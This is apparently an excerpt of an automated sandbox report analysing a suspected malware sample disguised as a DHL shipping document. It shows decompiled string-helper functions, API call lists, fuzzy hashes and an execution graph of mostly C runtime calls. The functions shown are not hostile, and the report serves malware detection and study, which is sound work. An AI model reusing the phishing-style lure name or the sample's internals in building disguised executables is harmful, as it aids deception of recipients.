                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Window$CallMessageProcSendVisible
                        • String ID:
                        • API String ID: 3748168415-3916222277
                        • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                        • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                        • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                        • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                        0x00405f84
                        0x00405f8e
                        0x00405f91
                        0x00405f97
                        0x00405f98
                        0x00405f99
                        0x00405fa1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405fa1
                        0x00405fa3
                        0x00405fab

                        APIs
                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,80000000,00000003), ref: 00405F89
                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,80000000,00000003), ref: 00405F99
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CharPrevlstrlen
                        • String ID: C:\Users\user\Desktop
                        • API String ID: 2709904686-1669384263
                        • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                        • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                        • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                        • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                        0x004060cd
                        0x004060cf
                        0x004060d2
                        0x004060fe
                        0x004060d7
                        0x004060e0
                        0x004060e5
                        0x004060f0
                        0x004060f3
                        0x0040610f
                        0x004060f5
                        0x004060fc
                        0x00000000
                        0x004060fc
                        0x00406108
                        0x0040610c
                        0x0040610c
                        0x00406106
                        0x00000000

                        APIs
                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                        • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                        • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: lstrlen$CharNextlstrcmpi
                        • String ID:
                        • API String ID: 190613189-0
                        • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                        • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                        • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                        • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:8%
                        Dynamic/Decrypted Code Coverage:5.1%
                        Signature Coverage:6.4%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:131
                        execution_graph 14518 1062f00 14521 1065597 14518->14521 14524 106562b 14521->14524 14523 1062f15 14525 1065637 __expandlocale 14524->14525 14526 106564a 14525->14526 14528 106566e 14525->14528 14527 10647cc __woutput_s_l 70 API calls 14526->14527 14529 106564f 14527->14529 14547 1066594 InitOnceExecuteOnce 14528->14547 14531 106471d __woutput_s_l 9 API calls 14529->14531 14535 106565a __expandlocale 14531->14535 14532 1065673 14533 1062e2a __lock_file 71 API calls 14532->14533 14532->14535 14534 1065680 14533->14534 14536 1065573 __output_p_l 70 API calls 14534->14536 14546 10656f5 14534->14546 14535->14523 14543 1065690 14536->14543 14538 1065793 __stbuf 71 API calls 14539 1065705 14538->14539 14540 1065762 __ftbuf 103 API calls 14539->14540 14542 1065720 14540->14542 14541 10647cc __woutput_s_l 70 API calls 14544 10656ea 14541->14544 14548 106573d 14542->14548 14543->14541 14543->14546 14545 106471d __woutput_s_l 9 API calls 14544->14545 14545->14546 14546->14538 14546->14542 14547->14532 14549 1062e99 _fseek 2 API calls 14548->14549 14550 1065743 14549->14550 14550->14535 16576 1064c00 16577 1064c0c __expandlocale 16576->16577 16578 1064c13 16577->16578 16579 1064c1c 16577->16579 16581 1064c55 _flsall 107 API calls 16578->16581 16580 1062e2a __lock_file 71 API calls 16579->16580 16582 1064c22 16580->16582 16586 1064c19 __expandlocale 16581->16586 16587 1064b4d 16582->16587 16588 1064b61 16587->16588 16589 1064b58 16587->16589 16591 1064b93 __flush 103 API calls 16588->16591 16590 1064c55 _flsall 107 API calls 16589->16590 16593 1064b5e 16590->16593 16592 1064b67 16591->16592 16592->16593 16594 1065573 __output_p_l 70 API calls 16592->16594 16597 1064c4d 16593->16597 16595 1064b80 16594->16595 16600 106bdf9 16595->16600 16598 1062e99 _fseek 2 API calls 16597->16598 16599 1064c53 16598->16599 16599->16586 16601 106be05 __expandlocale 16600->16601 16602 106be1d 16601->16602 16603 106be0d 16601->16603 16624 1066594 InitOnceExecuteOnce 16602->16624 16604 10647cc __woutput_s_l 70 API calls 16603->16604 16606 106be12 __expandlocale 16604->16606 16606->16593 16607 106bed7 16608 10647cc __woutput_s_l 70 API calls 16607->16608 16611 106bedc 16608->16611 16609 106be22 16609->16606 16609->16607 16610 106be63 16609->16610 16612 1070b73 ___lock_fhandle 72 API calls 16610->16612 16613 106471d __woutput_s_l 9 API calls 16611->16613 16614 106be69 16612->16614 16613->16606 16615 106bea6 16614->16615 16616 1070e34 __get_osfhandle 71 API calls 16614->16616 16617 10647cc __woutput_s_l 70 API calls 16615->16617 16618 106be86 FlushFileBuffers 16616->16618 16619 106bead 16617->16619 16620 106be92 GetLastError 16618->16620 16621 106be9a 16618->16621 16625 106becf 16619->16625 16620->16621 16621->16619 16623 1064798 __chsize_s 70 API calls 16621->16623 16623->16615 16624->16609 16628 107103e LeaveCriticalSection 16625->16628 16627 106bed5 16627->16606 16628->16627 14551 107530b 14552 1075317 __expandlocale 14551->14552 14553 107534e __expandlocale 14552->14553 14554 1064d39 __lock 70 API calls 14552->14554 14555 107532b 14554->14555 14556 1070362 __updatetlocinfoEx_nolock 78 API calls 14555->14556 14557 107533b 14556->14557 14559 1075354 14557->14559 14562 1064ebd LeaveCriticalSection 14559->14562 14561 107535b 14561->14553 14562->14561 16719 106d42c 16720 106d438 __expandlocale 16719->16720 16721 106d527 16720->16721 16722 106d4ba _siglookup _memmove 16720->16722 16730 106d481 16720->16730 16723 1064d39 __lock 70 API calls 16721->16723 16725 106d4ed __expandlocale 16722->16725 16726 10647cc __woutput_s_l 70 API calls 16722->16726 16724 106d52e 16723->16724 16728 106d558 16724->16728 16729 106d546 SetConsoleCtrlHandler 16724->16729 16727 106d66a 16726->16727 16731 106471d __woutput_s_l 9 API calls 16727->16731 16733 106d605 DecodePointer 16728->16733 16734 106d57f 16728->16734 16729->16728 16732 106d55f 16729->16732 16730->16722 16735 106b2c5 __getptd_noexit 70 API calls 16730->16735 16731->16725 16737 1064798 __chsize_s 70 API calls 16732->16737 16736 106d61b EncodePointer 16733->16736 16748 106d591 16733->16748 16738 106d5e1 DecodePointer 16734->16738 16742 106d5bd DecodePointer 16734->16742 16743 106d589 16734->16743 16744 106d499 16735->16744 16736->16748 16741 106d564 GetLastError 16737->16741 16739 106d5f7 EncodePointer 16738->16739 16738->16748 16739->16748 16741->16728 16745 106d5d3 EncodePointer 16742->16745 16742->16748 16746 106d58e 16743->16746 16747 106d599 DecodePointer 16743->16747 16744->16722 16750 1064f54 __malloc_crt 70 API calls 16744->16750 16745->16748 16746->16738 16746->16748 16747->16748 16749 106d5af EncodePointer 16747->16749 16751 106d643 16748->16751 16749->16748 16750->16722 16754 1064ebd LeaveCriticalSection 16751->16754 16753 106d64a 16753->16722 16754->16753 14704 106af32 14705 106af67 14704->14705 14708 106af42 14704->14708 14708->14705 14711 106cd92 14708->14711 14712 106cd9e __expandlocale 14711->14712 14713 106b2ad __expandlocale 70 API calls 14712->14713 14714 106cda3 14713->14714 14719 10729b7 14714->14719 14730 106d170 DecodePointer 14719->14730 14721 10729bc 14722 10729c7 14721->14722 14731 106d23b 14721->14731 14724 10729ef 14722->14724 14725 10729d1 IsProcessorFeaturePresent 14722->14725 14727 106533a _raise 70 API calls 14724->14727 14726 10729dc 14725->14726 14728 10645b5 _abort 7 API calls 14726->14728 14729 10729f9 14727->14729 14728->14724 14730->14721 14735 106d247 __expandlocale 14731->14735 14732 106d2a9 14733 106d286 DecodePointer 14732->14733 14739 106d2b8 14732->14739 14738 106d275 _siglookup 14733->14738 14734 106d270 14736 106b2c5 __getptd_noexit 70 API calls 14734->14736 14735->14732 14735->14733 14735->14734 14740 106d26c 14735->14740 14736->14738 14742 106d316 14738->14742 14745 106533a _raise 70 API calls 14738->14745 14751 106d27e __expandlocale 14738->14751 14741 10647cc __woutput_s_l 70 API calls 14739->14741 14740->14734 14740->14739 14743 106d2bd 14741->14743 14746 1064d39 __lock 70 API calls 14742->14746 14748 106d321 14742->14748 14744 106471d __woutput_s_l 9 API calls 14743->14744 14744->14751 14745->14742 14746->14748 14747 106d385 EncodePointer 14749 106d356 14747->14749 14748->14747 14748->14749 14752 106d3b6 14749->14752 14751->14722 14753 106d3c1 14752->14753 14754 106d3ba 14752->14754 14753->14751 14756 1064ebd LeaveCriticalSection 14754->14756 14756->14753 16884 1069647 16885 1065839 _LocaleUpdate::_LocaleUpdate 80 API calls 16884->16885 16886 10696a8 16885->16886 16887 10647cc __woutput_s_l 70 API calls 16886->16887 16888 10696be 16887->16888 16914 1066594 InitOnceExecuteOnce 16888->16914 16890 10696c9 16891 10696ea 16890->16891 16902 10696cd 16890->16902 16907 1069718 6 library calls 16890->16907 16892 10647cc __woutput_s_l 70 API calls 16891->16892 16894 10696ef 16892->16894 16893 10678fa __expandlocale 6 API calls 16895 106a928 16893->16895 16896 106471d __woutput_s_l 9 API calls 16894->16896 16896->16902 16897 1069b6d 16898 10647cc __woutput_s_l 70 API calls 16897->16898 16899 1069b72 16898->16899 16900 106471d __woutput_s_l 9 API calls 16899->16900 16900->16902 16901 1062d5a 71 API calls __woutput_p_l 16901->16907 16902->16893 16903 106a302 DecodePointer 16903->16907 16904 1064ed2 _free 70 API calls 16904->16907 16905 1064f54 __malloc_crt 70 API calls 16905->16907 16906 10703f5 __isleadbyte_l 80 API calls 16906->16907 16907->16897 16907->16901 16907->16902 16907->16903 16907->16904 16907->16905 16907->16906 16908 106a352 DecodePointer 16907->16908 16909 106a37a DecodePointer 16907->16909 16910 106a981 105 API calls _write_multi_char 16907->16910 16911 106a9ad 105 API calls _write_string 16907->16911 16912 1071597 82 API calls __woutput_s_l 16907->16912 16913 106a94b 105 API calls _write_multi_char 16907->16913 16908->16907 16909->16907 16910->16907 16911->16907 16912->16907 16913->16907 16914->16890 14784 1074d41 14787 1074f0f 14784->14787 14786 1074d52 14788 1074f1b __expandlocale 14787->14788 14789 1074f33 14788->14789 14790 1074f23 14788->14790 14815 1066594 InitOnceExecuteOnce 14789->14815 14791 1064798 __chsize_s 70 API calls 14790->14791 14793 1074f28 __expandlocale 14791->14793 14793->14786 14794 1074f38 14794->14793 14795 1074fe4 14794->14795 14798 1074f6e 14794->14798 14796 1064798 __chsize_s 70 API calls 14795->14796 14797 1074fe9 14796->14797 14799 10647cc __woutput_s_l 70 API calls 14797->14799 14800 1074f8d 14798->14800 14803 1074f7c 14798->14803 14801 1074f89 14799->14801 14802 1070b73 ___lock_fhandle 72 API calls 14800->14802 14807 106471d __woutput_s_l 9 API calls 14801->14807 14804 1074f93 14802->14804 14805 1064798 __chsize_s 70 API calls 14803->14805 14808 1074fa6 14804->14808 14809 1074fb9 14804->14809 14806 1074f81 14805->14806 14810 10647cc __woutput_s_l 70 API calls 14806->14810 14807->14793 14811 1074d5b __chsize_nolock 106 API calls 14808->14811 14812 10647cc __woutput_s_l 70 API calls 14809->14812 14810->14801 14813 1074fb2 14811->14813 14812->14813 14816 1074fda 14813->14816 14815->14794 14819 107103e LeaveCriticalSection 14816->14819 14818 1074fe0 14818->14793 14819->14818 16938 106ea56 16939 1065839 _LocaleUpdate::_LocaleUpdate 80 API calls 16938->16939 16940 106eab7 16939->16940 16941 10647cc __woutput_s_l 70 API calls 16940->16941 16942 106eacb 16941->16942 16963 1066594 InitOnceExecuteOnce 16942->16963 16944 106ef51 16948 10678fa __expandlocale 6 API calls 16944->16948 16945 10647cc __woutput_s_l 70 API calls 16949 106ef46 16945->16949 16946 106ead6 16946->16944 16947 1065573 __output_p_l 70 API calls 16946->16947 16952 106eaf2 _memset __output_p_l 16946->16952 16962 106ef2b __output_p_l 16946->16962 16947->16952 16950 106ef76 16948->16950 16951 106471d __woutput_s_l 9 API calls 16949->16951 16951->16944 16952->16944 16953 107327d 83 API calls __wcstoi64 16952->16953 16960 106f0c5 16952->16960 16961 106f19b 16952->16961 16952->16962 16953->16952 16954 10703f5 __isleadbyte_l 80 API calls 16955 106f1c1 16954->16955 16956 106f1ff 16955->16956 16957 106ff13 _write_string 103 API calls 16955->16957 16958 106ff13 _write_string 103 API calls 16956->16958 16959 106f1df 16957->16959 16958->16960 16959->16956 16959->16962 16961->16954 16962->16945 16962->16960 16963->16946 14870 106cd5a 14876 10668f0 14870->14876 14872 106cd66 DecodePointer 14873 106cd76 14872->14873 14874 106cd92 74 API calls 14873->14874 14875 106cd91 14874->14875 14876->14872 17031 107506d 17035 1075079 __expandlocale 17031->17035 17032 10750b4 17033 10750cc 17032->17033 17034 10750bc 17032->17034 17052 1066594 InitOnceExecuteOnce 17033->17052 17036 10647cc __woutput_s_l 70 API calls 17034->17036 17035->17032 17040 10750a4 17035->17040 17038 10750c1 __expandlocale 17036->17038 17039 10750d1 17039->17038 17042 1075162 17039->17042 17045 107510a 17039->17045 17041 10647cc __woutput_s_l 70 API calls 17040->17041 17044 10750a9 17041->17044 17043 10647cc __woutput_s_l 70 API calls 17042->17043 17043->17044 17046 106471d __woutput_s_l 9 API calls 17044->17046 17047 1070b73 ___lock_fhandle 72 API calls 17045->17047 17046->17038 17048 1075110 17047->17048 17049 10647cc __woutput_s_l 70 API calls 17048->17049 17050 1075126 __setmode_nolock 17048->17050 17049->17050 17053 107515a 17050->17053 17052->17039 17056 107103e LeaveCriticalSection 17053->17056 17055 1075160 17055->17038 17056->17055 17057 106b277 17058 106b284 17057->17058 17059 106b2aa 17057->17059 17060 106b292 17058->17060 17065 106bbcd FlsGetValue 17058->17065 17066 106bbdb FlsSetValue 17060->17066 17063 106b2a2 17067 106b140 17063->17067 17065->17060 17066->17063 17070 106b14c __expandlocale 17067->17070 17068 106b256 __expandlocale 17068->17059 17069 106b165 17072 106b174 17069->17072 17073 1064ed2 _free 70 API calls 17069->17073 17070->17068 17070->17069 17071 1064ed2 _free 70 API calls 17070->17071 17071->17069 17074 106b183 17072->17074 17075 1064ed2 _free 70 API calls 17072->17075 17073->17072 17076 106b192 17074->17076 17077 1064ed2 _free 70 API calls 17074->17077 17075->17074 17078 106b1a1 17076->17078 17079 1064ed2 _free 70 API calls 17076->17079 17077->17076 17080 106b1b0 17078->17080 17081 1064ed2 _free 70 API calls 17078->17081 17079->17078 17082 106b1bf 17080->17082 17083 1064ed2 _free 70 API calls 17080->17083 17081->17080 17084 106b1d1 17082->17084 17085 1064ed2 _free 70 API calls 17082->17085 17083->17082 17086 1064d39 __lock 70 API calls 17084->17086 17085->17084 17087 106b1d9 17086->17087 17088 106b1e5 InterlockedDecrement 17087->17088 17089 106b1fe 17087->17089 17088->17089 17090 106b1f0 17088->17090 17103 106b262 17089->17103 17090->17089 17094 1064ed2 _free 70 API calls 17090->17094 17093 1064d39 __lock 70 API calls 17095 106b212 17093->17095 17094->17089 17096 107024b ___removelocaleref 8 API calls 17095->17096 17102 106b243 17095->17102 17098 106b227 17096->17098 17101 10700f1 ___freetlocinfo 70 API calls 17098->17101 17098->17102 17100 1064ed2 _free 70 API calls 17100->17068 17101->17102 17106 106b26e 17102->17106 17109 1064ebd LeaveCriticalSection 17103->17109 17105 106b20b 17105->17093 17110 1064ebd LeaveCriticalSection 17106->17110 17108 106b250 17108->17100 17109->17105 17110->17108 17149 106d67f 17152 106da0d 17149->17152 17151 106d68e 17153 106da19 __expandlocale 17152->17153 17154 106b2ad __expandlocale 70 API calls 17153->17154 17155 106da21 17154->17155 17156 106d939 __setmbcp 72 API calls 17155->17156 17157 106da2b 17156->17157 17158 106d6d6 getSystemCP 82 API calls 17157->17158 17159 106da36 17158->17159 17160 1064f54 __malloc_crt 70 API calls 17159->17160 17162 106db80 __expandlocale 17159->17162 17161 106da4d 17160->17161 17161->17162 17163 106dbbb __setmbcp_nolock 92 API calls 17161->17163 17162->17151 17164 106da74 17163->17164 17165 106da83 InterlockedDecrement 17164->17165 17166 106db90 17164->17166 17167 106da96 17165->17167 17168 106daab InterlockedIncrement 17165->17168 17166->17162 17170 106dba3 17166->17170 17172 1064ed2 _free 70 API calls 17166->17172 17167->17168 17171 1064ed2 _free 70 API calls 17167->17171 17168->17162 17169 106dac2 17168->17169 17169->17162 17175 1064d39 __lock 70 API calls 17169->17175 17173 10647cc __woutput_s_l 70 API calls 17170->17173 17174 106daa7 17171->17174 17172->17170 17173->17162 17174->17168 17176 106dad6 InterlockedDecrement 17175->17176 17178 106db67 InterlockedIncrement 17176->17178 17179 106db54 17176->17179 17183 106db85 17178->17183 17179->17178 17181 1064ed2 _free 70 API calls 17179->17181 17182 106db66 17181->17182 17182->17178 17186 1064ebd LeaveCriticalSection 17183->17186 17185 106db8c 17185->17162 17186->17185 15011 107158e 15012 107150d __expandlocale 15011->15012 15013 1071527 15012->15013 15014 107153e 15012->15014 15015 10647cc __woutput_s_l 70 API calls 15013->15015 15026 1066594 InitOnceExecuteOnce 15014->15026 15017 107152c 15015->15017 15019 106471d __woutput_s_l 9 API calls 15017->15019 15018 1071543 15020 1062e2a __lock_file 71 API calls 15018->15020 15022 1071537 __expandlocale 15018->15022 15019->15022 15021 1071555 15020->15021 15027 1071388 15021->15027 15026->15018 15028 10714de 15027->15028 15029 10713a8 15027->15029 15031 1071498 15028->15031 15068 1074bd2 15028->15068 15030 1065573 __output_p_l 70 API calls 15029->15030 15032 10713ae 15030->15032 15035 10678fa __expandlocale 6 API calls 15031->15035 15034 10713d6 15032->15034 15037 1065573 __output_p_l 70 API calls 15032->15037 15034->15028 15039 1065573 __output_p_l 70 API calls 15034->15039 15036 107150b 15035->15036 15062 1071586 15036->15062 15038 10713bf 15037->15038 15038->15034 15041 1065573 __output_p_l 70 API calls 15038->15041 15040 10713fc 15039->15040 15042 107141f 15040->15042 15044 1065573 __output_p_l 70 API calls 15040->15044 15043 10713cb 15041->15043 15042->15028 15047 1065573 __output_p_l 70 API calls 15042->15047 15045 1065573 __output_p_l 70 API calls 15043->15045 15046 1071408 15044->15046 15045->15034 15046->15042 15049 1065573 __output_p_l 70 API calls 15046->15049 15048 1071445 15047->15048 15051 1065573 __output_p_l 70 API calls 15048->15051 15061 1071468 15048->15061 15050 1071414 15049->15050 15053 1065573 __output_p_l 70 API calls 15050->15053 15054 1071451 15051->15054 15052 107147f 15065 10709b5 15052->15065 15053->15042 15056 1065573 __output_p_l 70 API calls 15054->15056 15054->15061 15057 107145d 15056->15057 15058 1065573 __output_p_l 70 API calls 15057->15058 15058->15061 15059 1071491 15059->15031 15060 106793b __fputwc_nolock 103 API calls 15059->15060 15060->15059 15061->15028 15061->15052 15063 1062e99 _fseek 2 API calls 15062->15063 15064 107158c 15063->15064 15064->15022 15066 1070862 __wctomb_s_l 82 API calls 15065->15066 15067 10709cb 15066->15067 15067->15059 15092 1066594 InitOnceExecuteOnce 15068->15092 15070 1074bdc 15071 1074be0 15070->15071 15072 1065573 __output_p_l 70 API calls 15070->15072 15071->15031 15073 1074bf0 15072->15073 15074 1074bfb 15073->15074 15075 1074c08 15073->15075 15076 10647cc __woutput_s_l 70 API calls 15074->15076 15077 1074c0d 15075->15077 15085 1074c26 _vwprintf_helper 15075->15085 15086 1074c00 15076->15086 15078 10647cc __woutput_s_l 70 API calls 15077->15078 15078->15086 15079 1074c80 15080 1074d07 15079->15080 15081 1074c8a 15079->15081 15082 106bef0 __write 103 API calls 15080->15082 15083 1074ca6 15081->15083 15088 1074cbd 15081->15088 15082->15086 15084 106bef0 __write 103 API calls 15083->15084 15084->15086 15085->15079 15085->15086 15087 106fffd __isatty 71 API calls 15085->15087 15089 1074c75 15085->15089 15086->15031 15087->15089 15088->15086 15090 1067780 __lseeki64 76 API calls 15088->15090 15089->15079 15091 1070a65 __getbuf 70 API calls 15089->15091 15090->15086 15091->15079 15092->15070 17206 1067a97 17207 1065839 _LocaleUpdate::_LocaleUpdate 80 API calls 17206->17207 17208 1067b04 17207->17208 17209 10647cc __woutput_s_l 70 API calls 17208->17209 17210 1067b09 17209->17210 17235 1066594 InitOnceExecuteOnce 17210->17235 17212 1067b14 17213 1067b3a 17212->17213 17215 1067b18 17212->17215 17234 1067b50 __aulldvrm __woutput_s_l _strlen 17212->17234 17214 10647cc __woutput_s_l 70 API calls 17213->17214 17217 1067b3f 17214->17217 17216 10678fa __expandlocale 6 API calls 17215->17216 17218 106866e 17216->17218 17219 106471d __woutput_s_l 9 API calls 17217->17219 17219->17215 17220 10686bf 105 API calls _write_string 17220->17234 17221 1064ed2 _free 70 API calls 17221->17234 17222 10681e8 DecodePointer 17222->17234 17223 10703f5 __isleadbyte_l 80 API calls 17223->17234 17224 10686f5 105 API calls _write_multi_char 17224->17234 17225 1068721 105 API calls _write_string 17225->17234 17226 1071597 82 API calls __woutput_s_l 17226->17234 17227 1068670 17229 10647cc __woutput_s_l 70 API calls 17227->17229 17228 1064f54 __malloc_crt 70 API calls 17228->17234 17232 1068675 17229->17232 17230 106824b DecodePointer 17230->17234 17231 1068273 DecodePointer 17231->17234 17233 106471d __woutput_s_l 9 API calls 17232->17233 17233->17215 17234->17215 17234->17220 17234->17221 17234->17222 17234->17223 17234->17224 17234->17225 17234->17226 17234->17227 17234->17228 17234->17230 17234->17231 17235->17212 15136 106879a 15137 1065839 _LocaleUpdate::_LocaleUpdate 80 API calls 15136->15137 15138 1068807 15137->15138 15139 10647cc __woutput_s_l 70 API calls 15138->15139 15140 106880c 15139->15140 15169 1066594 InitOnceExecuteOnce 15140->15169 15142 1068817 15143 106881b 15142->15143 15144 106883d 15142->15144 15165 1068853 __aulldvrm __woutput_s_l _strlen 15142->15165 15148 10678fa __expandlocale 6 API calls 15143->15148 15145 10647cc __woutput_s_l 70 API calls 15144->15145 15146 1068842 15145->15146 15147 106471d __woutput_s_l 9 API calls 15146->15147 15147->15143 15149 106938c 15148->15149 15150 106935d 15150->15143 15151 10647cc __woutput_s_l 70 API calls 15150->15151 15152 10693bf 15151->15152 15153 106471d __woutput_s_l 9 API calls 15152->15153 15153->15143 15154 1068ef7 DecodePointer 15154->15165 15155 1064ed2 _free 70 API calls 15155->15165 15156 10703f5 __isleadbyte_l 80 API calls 15156->15165 15157 1064f54 __malloc_crt 70 API calls 15157->15165 15158 106938e 15159 10647cc __woutput_s_l 70 API calls 15158->15159 15161 1069393 15159->15161 15160 1068f5a DecodePointer 15160->15165 15164 106471d __woutput_s_l 9 API calls 15161->15164 15162 1068f82 DecodePointer 15162->15165 15163 1069458 105 API calls _write_string 15163->15165 15164->15143 15165->15143 15165->15150 15165->15154 15165->15155 15165->15156 15165->15157 15165->15158 15165->15160 15165->15162 15165->15163 15166 1071597 82 API calls __woutput_s_l 15165->15166 15167 10693f6 105 API calls __woutput_s_l 15165->15167 15168 106942c 105 API calls _write_multi_char 15165->15168 15166->15165 15167->15165 15168->15165 15169->15142 12646 10642a4 12647 10642b0 __expandlocale 12646->12647 12679 106bbec GetStartupInfoW 12647->12679 12649 10642b5 12681 106b6b1 GetProcessHeap 12649->12681 12651 106430d 12652 1064318 12651->12652 12811 106442e 12651->12811 12682 106b3e0 12652->12682 12655 106431e 12656 106442e _fast_error_exit 70 API calls 12655->12656 12657 1064329 __ioinit0 __RTC_Initialize 12655->12657 12656->12657 12658 1064338 GetCommandLineW 12657->12658 12703 106bb1d GetEnvironmentStringsW 12658->12703 12662 1064352 12663 106435d 12662->12663 12819 106526f 12662->12819 12713 106b914 12663->12713 12666 1064363 12667 106436e 12666->12667 12668 106526f __amsg_exit 70 API calls 12666->12668 12729 10652a9 12667->12729 12668->12667 12670 1064376 12671 1064381 __wwincmdln 12670->12671 12672 106526f __amsg_exit 70 API calls 12670->12672 12735 1061c90 6 API calls 12671->12735 12672->12671 